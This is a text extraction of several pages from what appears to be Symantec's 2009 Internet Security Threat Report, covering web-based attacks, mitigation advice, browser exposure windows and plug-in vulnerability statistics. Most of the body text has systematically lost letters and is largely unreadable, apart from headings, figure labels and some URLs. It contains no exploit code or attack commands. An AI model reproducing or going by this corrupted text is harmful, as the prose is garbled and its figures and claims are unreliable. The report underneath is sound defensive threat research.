housads of wbss oall os suscbl o faud, whch a oula ags of aack fo Wb

alcao ad s-scfc vulabls. Also, housads of wbss Cha w coosd wh

ca Wb alcaos w fcd wh alcous JavaSc ha was lad hough h us of SQL-

jco aacks.84 Vsos o hs coosd ss had h cous aackd ad, f h aacks

w succssful, tojas w dowloadd oo h cous.85

Uka akd hd 2008 fo o cou of og fo Wb-basd aacks, accoug fo 12 c

of such aacks woldwd. th oc of Uka hs c s lkl du o h coos of h

wbs of a U.S.-basd lcoc bll a ocssg coa.86 th aacks w abl o oba

accou cdals o h coas doa usg a hshg aack, ad w h abl o ga accss

o h coas wbs. Cusos, hkg h w vsg h lga wbs, w dcd o

a alcous wbs hosd o svs h Uka wh h w aackd wh a toja.87 i addo

o h coos of h bll a coas wbs, h w a las 71 doas ha w

dcd o h alcous Ukaa sv dug hs .88

Of o, sx of h o 10 cous fo Wb-basd aacks h emeA go w also h o 10

cous of og fo Wb-basd aacks globall, ad cous h emeA go accoud fo

41 c of h woldwd oal, o ha a oh go. exlo acks a b o of asos

bhd h oc of h emeA go hs asu. ma xlo acks, cludg mpack,89

icpack,90 ad noslo,91 ogad russa ad s lkl ha h russas who dvlod hs

aack ks a sosbl fo uch of h coud oagao. ths aacks could ossbl b

coosg wbss aoud h wold ad dcg vsos o cous emeA ha hos h

xlo cod bg usd o ag cl-sd vulabls Wb bowss.

Also cobug o h oc of h emeA go hs od w a ub of hgh-ofl Wb-

basd aacks ha occud h. O xal was Jaua 2008, wh h bass wbs of h

nhlads russa was coosd ad vsos o h s w sld o sallg alcous

cod.92 Aoh xal occud Augus 2008 wh sval hudd doas h nhlads w

coosd ad dfacd.93 A hd cas was wh o ha a housad UK wbss w coosd

82 h://ws.bbc.co.uk/1/h/cholog/7548870.s83 h://www.wokwold.co/wsls/gw/2008/090808sg1.hl84 h://www.h-ol.co/scu/Chs-wbss-ud-ass-aack--/ws/11076485 ibd.86 h://www.wokwold.co/ws/2008/120508-wok-soluos-hshg-ca-bfo.hl87 h://www.csool.co/acl/474365/ChckF_Was_mllo_Cusos_Af_Hack88 h://blog.kvuka.fo/2008/12/dggg-d-o-chckf-aack.hl89 hs://fous2.sac.co/5/blogs/blogaclag/blog-d/vulabls_xlos/acl-d/93#m9390 hs://fous2.sac.co/5/Vulabls-exlos/Hoo-Aog-thvs/ba-/306084#A19391 h://blogs.zd.co/scu/?=159392 h://www.hgs.co.uk/2008/01/23/bass_ss_sv_alwa/93 h://blogs.zd.co/scu/?=1788


33/110


33

ad uss vsg hs ss skd bg fcd wh h Asox toja.94 th succss of hs aacks

o gov ss ca b abud, a, o h h us ha vsos o such ss wll hav,

akg hs vsos o labl o acc os o dowload fls f qusd.

Wb-basd aacks a a ajo ha o cou woks fo boh ss ad d uss. Aacks

such as dv-b dowloads a cov ad v dffcul o ga bcaus os uss a uawa ha

h a bg aackd. Ogazaos a hus cofod wh h colcad ask of havg o dc

ad fl aack affc fo lga affc. Sc a ogazaos l o Wb-basd ools ad

alcaos o coduc busss, s lkl ha h Wb wll cou o b h a codu fo

aack acv favod b alcous cod dvlos.

Threat activityprotection and mitigation

th a a ub of asus ha ss, adsaos, ad d uss ca lo o oc

agas alcous acv. Ogazaos should oo all wok-cocd cous fo sgs of

alcous acv, cludg bo acv ad oal scu bachs, sug ha a fcd

cous a ovd fo h wok ad dsfcd as soo as ossbl. Ogazaos should

lo dfs--dh sags, cludg h dlo of avus sofwa ad a fwall.95

Adsaos should uda avus dfos gulal ad su ha all dsko, lao, ad

sv cous a udad wh all cssa scu achs fo h oag ss vdo.

As coosd cous ca b a ha o oh sss, Sac also cods ha

ss of h iSps of a oall alcous acv.

Sac cods ha ogazaos fo boh gss ad gss flg o all wok affc

o su ha alcous acv ad uauhozd coucaos a o akg lac. Ogazaos

should also fl ou oall alcous al aachs o duc xosu o ss ad d

uss. i addo, gss flg s o of h bs was o ga a DoS aack. DoS vcs fqul

d o gag h usa iSp o hl fl h affc o ga h ffcs of aacks.

Sac also advss ha uss v vw, o, o xcu a al aach ulss h aach

s xcd ad cos fo a kow ad usd souc, ad ulss h uos of h aach s

kow. B cag ad focg olcs ha df ad sc alcaos ha ca accss h

wok, ogazaos ca z h ffc of alcous acv, ad hc, z h ffc o

da-o-da oaos. Also, adsaos should l vlgs o sss fo uss ha do o qu

such accss ad h should also sc uauhozd dvcs, such as xal oabl had-dvs ad

oh ovabl da.

94 h://cholog.sol.co.uk/ol/ws/ch_ad_wb/h_wb/acl4381034.c95 Dfs--dh haszs ull, ovlag, ad uuall suov dfsv sss o guad agas sgl-o falus a scfc cholog o

oco hodolog. Dfs--dh should clud h dlo of avus, fwalls, ad uso dco sss, aog oh scu asus.


34/110


34

to duc h lklhood of d hf, ogazaos ha so soal foao should ak h

cssa ss o oc daa asd ov h i o sod o h cous. ths should

clud h dvlo, lao, ad foc of a scu olc qug ha all ssv

daa s cd. Ogazaos should l a daa loss oco (DLp) soluo ha o ol

vs daa bachs, bu also gas oal daa laks fo wh a ogazao. Accss ossv foao should b scd ad ogazaos should also foc colac o foao

soag ad assso sadads such as h pCi sadad.96 polcs ha su ha cous

coag ssv foao a k scu locaos ad a accssd ol b auhozd

dvduals should b u lac ad focd. Ssv daa should o b sod o obl dvcs ha

could b asl slacd o sol. ths s should b a of a boad scu olc ha ogazaos

should dvlo ad l od o su ha a ssv daa s ocd fo uauhozd

accss. ths would su ha v f h cou o du o whch h daa w los o sol, h

daa would o b accssbl. ths s should b a of a boad scu olc ha ogazaos should

dvlo ad l od o su ha a ssv daa s ocd fo uauhozd accss.

96 hs://www.cscusadads.og/


35/110


35

Vulnerability Trends

ths sco wll dscuss slcd vulabl ds ga dh, ovdg aalss ad dscusso

of h ds dcad b h daa. th followg cs wll b dscussd:

Wdow of xosu fo Wb bowss

Wb bows vulabls

Wb bows lug- vulabls

Wb bows lug- vulabls, b

Wb alcao vulabls

S-scfc coss-s scg vulabls

Zo-da vulabls

to aackd vulabls

Aackd vulabls b aack vco (cl vsus sv)

Vulablsoco ad gao

Window of exposure for Web browsers

th wdow of xosu fo Wb bowss s h dffc das bw h wh xlo cod

affcg a vulabl s ad ublc ad h wh h affcd vdo aks a ach ublcl

avalabl fo ha vulabl. Dug hs , h cou o ss o whch h affcd alcao

s dlod a b suscbl o aack. th c s dvd fo h avag aou of ook o

las a ach coaso o h avag aou of ook fo xlo cod o b ad ublcl

avalabl. ths c also cluds axu ach s, whch s h axu aou of qud

o las a ach fo all of h achd vulabls h daa s.

B asug h aou of aks fo vdos o las achs fo vulabls, s ossbl o

ga so sgh o h ovall scu sosvss. So of h vulabls xad hs

c w achd b h vdo a h h w aoucd. ths a b flcv of a al

scu aud b h vdo, whch a hav vald h vulabl. i a also dca ha scu

sachs dscovd h vulabl ad sosbl dsclosd o h vdo. Oh vulabls

a ddl od b scu sachs o o h las of a ach. ths dcas ha

scu sachs dd o cooda wh h vdo o dsclos h vulabl. i so cass, hs

a a ha h sach dd o sosbl dsclos h vulabl, ad oh cass s

ossbl ha h sach ad o sosbl o h vulabl bu h vdo was

usosv. th ach las s coad agas h avag aks fo vulabl

xlos o bco ublcl avalabl o d h wdow of xosu.

th wdow of xosu aks all of hs facos o accou o calcula h avag dug whch

d uss ad ogazaos a xosd o xlos. Dug h wdow of xosu, adsaos add uss d o ga h ossbl of xloao b log cu bs accs ad h bs

avalabl gao chologs. Fo hgh o vulabls, ogazaos us dvo soucs o

gao ul h vulabl s adqual addssd ad lad as a sk.


36/110


36

ths c wll xa h wdow of xosu fo h followg Wb bowss:97

Al Safa

Googl Cho

mcosof i exlo

mozlla bowss

Oa

i 2008, h avag wdow of xosu fo Safa was das, basd o a sal s of 31 achd

vulabls (fgu 9). th wdow of xosu fo 2007 was o da, basd o a sal s of 31

achd vulabls. th gh-da cas h wdow of xosu fo Safa s du o a ub

of ddl dscovd vulabls. th axu fo Al o ach a Safa vulabl

2008 was 156 das, whch gavl affcd h avag ad s sgfcal log ha h axu

ach of gh das 2007

1

9

Opera

Mozilla

Internet Explorer

Chrome

Average time in days

0 2 4 6 8

Period

10

22007

8

2008 Safari

3

3

1

7


37/110


37

Fo h fs , hs o, Cho s cludd h bowss bg assssd b Sac. Bcaus

was lasd ol cl (Sb 2008), s bg cludd h al o ovd sgh o s

foac agas oh bowss hus fa ad o s a basl fo fuu os. i 2008, Sac

docud a avag wdow of xosu of h das fo Cho basd o a sal s of sx achd

vulabls. th axu ach fo a vulabl was 11 das.

th wdow of xosu fo Oa 2008 was o da, basd o a sal s of 33 achd

vulabls. i 2008, h axu o ach a vulabl was 29 das. i 2007, h wdow of

xosu fo Oa was wo das, basd o a sal s of 14 achd vulabls, ad h axu

ach was 23 das.

mozlla bowss had a wdow of xosu of lss ha o da 2008, basd o a sal s of

83 achd vulabls, ad h axu ach was 30 das. i 2007, mozlla bowss had

a wdow of xosu of h das, fo a sal s of 103 vulabls, ad h axu ach

was 109 das.

Of all h bows vdos xad, mozlla bowss aad h shos wdow of xosu whl

achg o vulabls ha oh vdos. ths a b dcav of h ffos o ashal h

scu cou o sosbl o vulabls hough avs such as h Bug Bou

oga.98 th sul of hs ffo s ha o vulabls a aoucd b h vdo a h

h a fxd, sad of bg ublcl od b scu sachs ddl of h vdo.

i s also woh og ha dd bows vdos, such as Oa ad h mozlla Foudao,

had a sho wdow of xosu 2008 ha h ajo oag ss vdos, such as Al ad

mcosof. ths a b du o h ossbl ha vdos whos a oduc s a Wb bows do o

hav o sad h scu sos ffos acoss ull, dsaa oducs, ad ca sad focus

o h bows. Coaabl, ajo oag ss vdos call hav o cooda scu

sos ffos acoss a lag ub of uachd vulabls affcg a o dvs oduc

ofolo ad ogazao. Vulabls oh oducs a ak o basd o a ub of facossuch as h sv of h vulabl, aack acv h wld, o h lav as of dvlog a

ach. Bcaus Cho s a w addo fo hs volu, as o b s how Googl wll fa h

log as a lag vdo whos Wb bows cholog ss ol a sall oo of h oducs

ad svcs offs.

Web browser vulnerabilities

Wb bows vulabls a a sous scu coc du o h ol ol faud ad h

oagao of alcous cod, swa, ad adwa. th a aculal o o scu cocs

bcaus h a xosd o a ga aou of oall uusd o hosl co ha os oh

alcaos. ths s a coc bcaus aacks ca oga fo alcous wbss as wll as lga

wbss ha hav b coosd o sv alcous co. Bowss ca also facla cl-sd

aacks bcaus of h us of lug-s ad oh alcaos hadlg oall alcous co

svd fo h Wb such as docus ad da fls.

98 h://www.ozlla.og/scu/bug-bou-faq.hl


38/110


38

ths c wll xa h oal ub of vulabls affcg h followg Wb bowss:

Al Safa

Googl Cho

mcosof i exlo

mozlla bowss

Oa

Dug 2008, 99 vulabls affcd mozlla bowss (fgu 10). Fo of hs vulabls w

cosdd low sv ad 59 w cosdd du sv. ths s fw ha h 122 vulabls

ha w docud 2007 fo mozlla bowss, of whch 91 w cosdd low sv ad 31 w

cosdd du sv.

Safari

Mozilla

47

122

99

Opera

Internet Explorer

Chrome

Documented vulnerabilities

0 20 60 100 120

Period

140

19

2007

57

2008 40

35

47

11

40 80

Figure 10. Web browser vulnerabilities

Source: Symantec

i exlo was subjc o 47 w vulabls 2008. Sx of hs vulabls w

cosdd low sv ad 31 w cosdd du sv. ths s fw ha h 57 w

vulabls docud i exlo 2007, of whch 28 w cosdd low sv,

28 w cosdd du sv, ad o was cosdd hgh sv.

Safa was affcd b 40 w vulabls 2008, of whch 16 w cosdd low sv ad

24 w cosdd du sv. ths s lss ha h 47 vulabls dfd Safa 2007,

of whch 27 w cosdd low sv, 19 w cosdd du sv, ad o was cosdd

hgh sv.


39/110


39

i 2008, Sac docud 35 w vulabls Oa, of whch 12 w cosdd low sv

ad 23 w cosdd du sv. ths s o ha h 19 vulabls dscovd Oa

2007, of whch gh w cosdd low sv ad 11 w cosdd du sv.

Cho was affcd b 11 vulabls 2008, of whch sv w cosdd low sv ad fou

w cosdd du sv. Cho was lasd Sb 2008 ad o coaso wh

vous as s ossbl.

Wh h xco of Oa (ad, as od, Cho), h w fw bows vulabls dfd

2008 ha hos 2007. th ac of Cho o h bows ak ad casg bows ak

sha of Oa a hav flucd scu sach o hs bowss ad shfd ao awa fo

oh bowss. th d owad fw oal vulabls bowss a also dca a shf b h

vdos o ov h scu of bowss.

Howv, s also woh og ha h d 2008 was owad o du-sv vulabls

bowss. ths a cola wh h ovall d owad a hgh ooo of du-sv

vulabls lao o all vulabls docud 2008. ths a also b dcav of volvg

sklls aog scu sachs ad aacks, who a dfg fw low-sv vulabls

as a sul. i should b od ha, a cass, du-sv vulabls a suffc o ou

succssful aacks f aacks a abl o xcu aba cod ad fo acos such as accssg

cofdal foao o akg wok cocos.

i s oa fo bows vdos o cou o ov bows scu gv h couous

coo aog vdos o dvlo ad clud o fau-ch oducs h oducs. i

2008, a ub of bows vdos ad cocd ffos o dosa h co o

scu. i acula, Googl lasd h Bows Scu Hadbook, whch ouls coo bows

scu ssus.99 th goal of hs ojc s o ad bows dvlos ad scu sachs h

udsadg of hs vulabls o hl df ad fx hs ssus. mozlla has also sad h

mozlla Scu mcs ojc as a a o quaf h lav scu of h bows oducs.100

Wb bowss cou o b a aacv ag fo aacks. i 2008, i exlo was h ag of

a zo-da vulabl s XmL-hadlg cod.101 ths vulabl was lkd wh SQL-jco aacks

ha coosd usd wbss fo h uos of hosg xlo cod fo h vulabl.102 ths

chqu was dald h vous volu of h Sac Global Internet Security Threat Report.103 i

s a coug d 2008 fo aacks o us Wb-alcao vulabls o coos lga

wbss fo whch fuh aacks ca h b lauchd. ths xlo s also owoh bcaus

as o obfusca sgs of a aack b closg h bows clal whou a os oc xloao

has occud. ths s a asu udak b aacks o xd h suvvabl of zo-da xlos. A

zo-da bows vulabl s a hghl valud ass ha aacks wok o oc agas dscov b

vcs ad scu vdos. pologg h dscov of a zo-da vulabl dlas h dvlo

of vdo achs ad scu co, such as uso v sgaus ha hl wh gao.

99 h://cod.googl.co//bowssc/wk/ma100 h://blog.ozlla.co/scu/2008/07/02/ozlla-scu-cs-ojc/101hs://fous2.sac.co/5/Vulabls-exlos/ys-th-s-a-Zo-Da-exlo-fo-i-exlo-Ou-th/ba-/371628#A180102hs://fous2.sac.co/5/Vulabls-exlos/rs-of-ie-Zo-Da-though-SQL-ijco/ba-/372832#A182103 h://val.sac.co/kgfo/s/wh_as/b-wha__scu_ha_o_x_04-2008.-us.df : . 34
https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Yes-There-s-a-Zero-Day-Exploit-for-Internet-Explorer-Out-There/ba-p/371628#A180https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Rise-of-IE-Zero-Day-Through-SQL-Injection/ba-p/372832#A182https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Rise-of-IE-Zero-Day-Through-SQL-Injection/ba-p/372832#A182https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Yes-There-s-a-Zero-Day-Exploit-for-Internet-Explorer-Out-There/ba-p/371628#A180


40/110


40

Aoh owoh bows scu ssu 2008 was h ca bobg flaw dscovd Safa.104

th vulabl would caus h bows o dowload aba fls o h vcs dsko. i was la

dscovd ha hs could fuh b xlod o xcu cod. ths ssu was acuall a cobao of

scu waksss Safa fo Wdows, i exlo, ad mcosof Wdows ha, wh xlod

ad, could sul h dlo of a alcous xcuabl. ths s sg bcaus hdlod vo of h bows was a faco ha lvad a lavl o vulabl o a

ajo o. ths ss a sk fo bows vdos wh h las oducs fo w lafos, as

Al dd wh s fs o-ba las of Safa 3.1 fo Wdows mach 2008. ths coc a b

lva fo Cho, as Googl s xcd o las vsos of h bows fo Lux ad mac OS X

2009.105

Adsaos should aa a scv olc gadg whch alcaos a allowd wh h

ogazao. th scu of alcaos should b valuad o a lafo-b-lafo bass o su

ha lafo-scfc scu ssus do o as wh h alcao s salld.

Web browser plug-in vulnerabilities

ths c wll xa h ub of vulabls affcg lug-s fo Wb bowss. Bows

lug-s a chologs ha u sd h Wb bows ad xd s faus. Of hs lug-s

allow addoal ulda co fo Wb ags o b dd h bows. th ca also

abl xcuo vos ha allow alcaos o b u sd h bows. Bows lug-

vulabls a also usd a ag of cl-sd aacks. ma bowss clud vaous lug-s

h dfaul sallao ad ovd a fawok o as h sallao of addoal lug-s.

plug-s ow ovd uch of h xcd o dsd fucoal of Wb bowss ad so a

v b qud o ffcvl us h al ss of ss.

th followg lug- chologs wll b xad:

Adob Acoba

Adob Flash

Al Quckt

mcosof AcvX

mcosof Wdows mda pla

mozlla bows xsos

Su Java

i 2008, Sac docud a oal of 419 vulabls lug- chologs fo Wb bowss.

ths s fw ha h 475 vulabls affcg bows lug-s dfd 2007. Of h oal

fo 2008, 287 vulabls affcd AcvX, whch s sgfcal o ha a oh lug-

cholog (fgu 11). Of h ag lug-s fo whch vulabls w docud, h

w 45 vulabls dfd Java, 40 Quckt, 17 Acoba rad, 16 Flash pla,

fv affcd mozlla xsos, ad fv ha affcd Wdows mda pla.

104 h://www.scufocus.co/bf/746105 h://ws.c.co/cho-gs-ac-dadl-xsos-foudao/?ag=col;wsnow


41/110


41

20082007

QuickTime 8%

Acrobat 1%

Mozilla extensions 1%

Java 4%

ActiveX 83%

Flash 2%

Windows Media Player 1%QuickTime 10%

Acrobat 4%

Mozilla extensions 1%

Java 11%

ActiveX 69%

Flash 4%

Windows Media Player 1%

Figure 11. Web browser plug-in vulnerabilities

Source: Symantec

AcvX was also affcd b h os vulabls 2007, wh a oal of 399 ou of h 475

vulabls dfd. Af ha, Quckt akd scod wh 37 vulabls, Java was affcd

b 17, Flash pla had 11, fou affcd mozlla xsos, h affcd Wdows mda pla, ad

h affcd Adob Acoba rad.

AcvX vulabls a sll a oula od of aack fo dvlos of aack oolks such as noSlo.

i 2008, a ub of addoal xlos fo AcvX addd o h noSlo oolk w dfd. ths

cluds a vulabl h Sasho Vw fo mcosof Accss,106 ad aoh h Cou

Assocas BghSo alcao.107 i fac, o xlo h mcosof Accss Sasho Vw vulabl,

aacks w o h lgh of sll sallg h vulabl cool o cl cous o vousl

affcd b h vulabl.108 ths hghlghs udlg scu ssus h AcvX scu odl

hough whch aacks a abl o sll sall vulabl AcvX coos ha a

cogahcall sgd b a vdo wh h usd cfca so of i exlo.

th valc of AcvX vulabls oss a acula coc o d uss ad ogazaos ha

us i exlo. Whl h ak sha of i exlo 7 suassd ha of i exlo 6

2008, h fac ha AcvX vulabls a sll a oula avu of aack suggss ha h scu

faus of i exlo 7 hav o lad h AcvX ha.109 i aas ha d uss a

ovdg hs scu faus ad cou o allow scu AcvX cools o b salld ad

xcud. mcosof i exlo 8 s slad o clud addoal scu faus o aag h

ha of scu AcvX cools.110 i s uca whh b AcvX scu i exlo 8

wll hav a ffc o h ub of vulabls h sho , sc h a sll a scu

106 hs://fous2.sac.co/5/Vulabls-exlos/mcosof-Accss-Sasho-Vw-exlod--noslo-Wa/ba-/335199#A164107 hs://fous2.sac.co/5/Vulabls-exlos/noslo-Udad-wh-exlo/ba-/314840#A151108 hs://fous2.sac.co/5/Vulabls-exlos/AcvX-Vulabls-ev-Wh-you-A--Vulabl-you-ma/ba-/341705#A165109 h://www.w3schools.co/bowss/bowss_sas.as110 h://blogs.sd.co//achv/2008/05/07/8-scu-a--acvx-ovs.asx


42/110


42

AcvX cools avalabl fo dowload o h i. Howv, h a b fw cds ad

xals of hs vulabls bg cooad o aack oolks f h scu asus bg

ld b mcosof a ffcv.

Oh lug- chologs such as Acoba w also subjc o xloao h wld.111 Fo sac,

h ub of lug- vulabls Java os du o casd s fo h scu sach

cou. Java s a aacv ag bcaus us os Wb bows vsos o os oag

sss. ths as ha a of h vulabls h Java lug- facla h dvlo of

coss-lafo xlo cod. ths ss a dal scao fo aacks bcaus xoss a lag

ub of ags o sl ad labl xloao. Aacks sk vulabls ha affc wdl

dlod alcaos ha ca b aackd hough h Wb bows.

Web browser plug-in vulnerabilities, by type

ths dscusso wll xa so scfc vulabls ha affc bows lug-s. to do so, h

vulabls covd h vous c a classfd o vaous cagos basd o h scu

ac. th ac of a vulabl hls o d h as b whch a aack accolshs s

goal b xlog h vulabl. i also hls adsaos oz h sks osd b a scfc

vulabl ad dvlo gaos ha a ooo o h ha.

th cagos blow a a o hghlgh h a ac o d uss. i should b od ha

so vulabls df cagozao du o adqua ublc foao abou h au of

h vulabl ad s oal ac. Vulabls ha could o b cagozd a od

h dscusso.

Vulabls affcg bows lug- chologs a classfd o h followg dsc cagos:112

Memory corruption: ths vulabls allow aacks o cou h o of a alcao

ocss wh alcous u ad ca allow aacks o xcu aba cod.

Denial-of-service (DoS): DoS vulabls call sul a alcao cash wh xlod.

Alhough hs could b du o a o couo ssu, hs vulabls a classfd as DoS

wh o oal of aba cod xcuo s aa.

Information disclosure: ths vulabls os of xos ssv foao o a

uauhozd a, h as a sul of acv xloao o as a adv sd ffc of a

oous codo h alcao.

Content injection: ths vulabls allow h jco of alcous co o allow aacks o

bass hd-a u valdao fls; h ca also abl coss-s scg aacks.

Spoofing: ths vulabls allow a aack o soof ls of h bows-us fac.

Unauthorized file system access: ths vulabls allow aacks o vw, odf, o dl fls o

h cou hosg h affcd bows lug-.

111 hs://fous2.sac.co/5/Vulabls-exlos/Acoba-ul-f-exlo-Dcd-wh-exsg-ipS/ba-/364088#A176112 Fo a o col dsco of hs cagos, las s Adx CVulabl tds mhodologs


43/110


43

Command execution: ths vulabls allow a o aack o xcu oag ss

coads hough a affcd bows lug-.

Origin validation: ths vulabls ca occu wh co fo a vald o uauhozd

ogag souc s ad as vald b a lug-.

Elevated security context: ths vulabls vola a scu olc dd o v o

co fo accssg ss os ad caabls. i should b od ha so vulabls

a s a oou fo lvad scu bass bu a o accual dscbd b

aoh cago.

i 2008, of h 415 vulabls dfd bows lug-s, 271 w classfd as o couo

vulabls (fgu 12). ths s followd b 61 uauhozd fl ss accss vulabls, 27 lvad

scu cox vulabls, 14 DoS aack vulabls, 13 foao dsclosu vulabls,

coad xcuo vulabls, gh og valdao vulabls, fou co jco

vulabls, ad o vulabl ha faclad soofg aacks. th ag sv vulabls

could o b classfd du o suffc foao abou h causs ad ffcs.

11%


44/110


44

mo couo vulabls also ad u h ajo of lug- vulabls 2007, wh 288

bg classfd as such ou of 475 oal vulabls dfd (abl 5). Of h ag, 76 w

cosdd DoS ssus, 54 allowd uauhozd fl ss accss, 24 allowd lvad scu cox,

allowd coad xcuo, gh allowd co jco, fv vulabls allowd foao

dsclosu, ad wo w lad o og valdao. th w o soofg vulabls bows lug- chologs 2007 ad vulabls could o b classfd du o a lack of foao abou

h causs ad ffcs of h vulabls.

mo couo vulabls cosud h ajo of bows lug- vulabls boh 2007

ad 2008. Howv, h daa dcas ha DoS vulabls w lss val 2008 ha h w

2007. i 2008, h w dslacd b uauhozd fl ss accss vulabls as h scod

hghs ooo of lug- cholog vulabls. i Ocob of 2008, Sac od h s

uauhozd fl ss accss vulabls affcg AcvX cools.113 A ha , aacks had

gad a ub of xlos fo hs ssus o aack oolks, ovg h ffcvss ad

oula aog aacks. i h sa oh, Sac also obsvd w aack as fo

uauhozd fl ss accss vulabls ha affcd AcvX cools.114 ths aack as

ca allow aacks o xlo uauhozd fl ss accss vulabls o xcu aba cod.

th dcas of DoS vulabls ad cas vulabls such as uauhozd fl ss accss

ad lvad scu cox dca a volvg skll s aog scu sachs ad aacks. i

acula, sachs ad aacks a dvlog h sklls o o hgh-sv vulabls

ha allow o cod xcuo ad oh sous cosqucs. ths also xlas h valc of

o couo vulabls bows lug-s bcaus, f succssfull xlod, h wll l a

aack u aba cod o h affcd cou. DoS vulabls lug- chologs a of

h sul of usklld scu sach ffos bcaus h ffc o cl alca

Documents

B-whitepaper Internet Security Threat Report Xiv 04-2009.en-us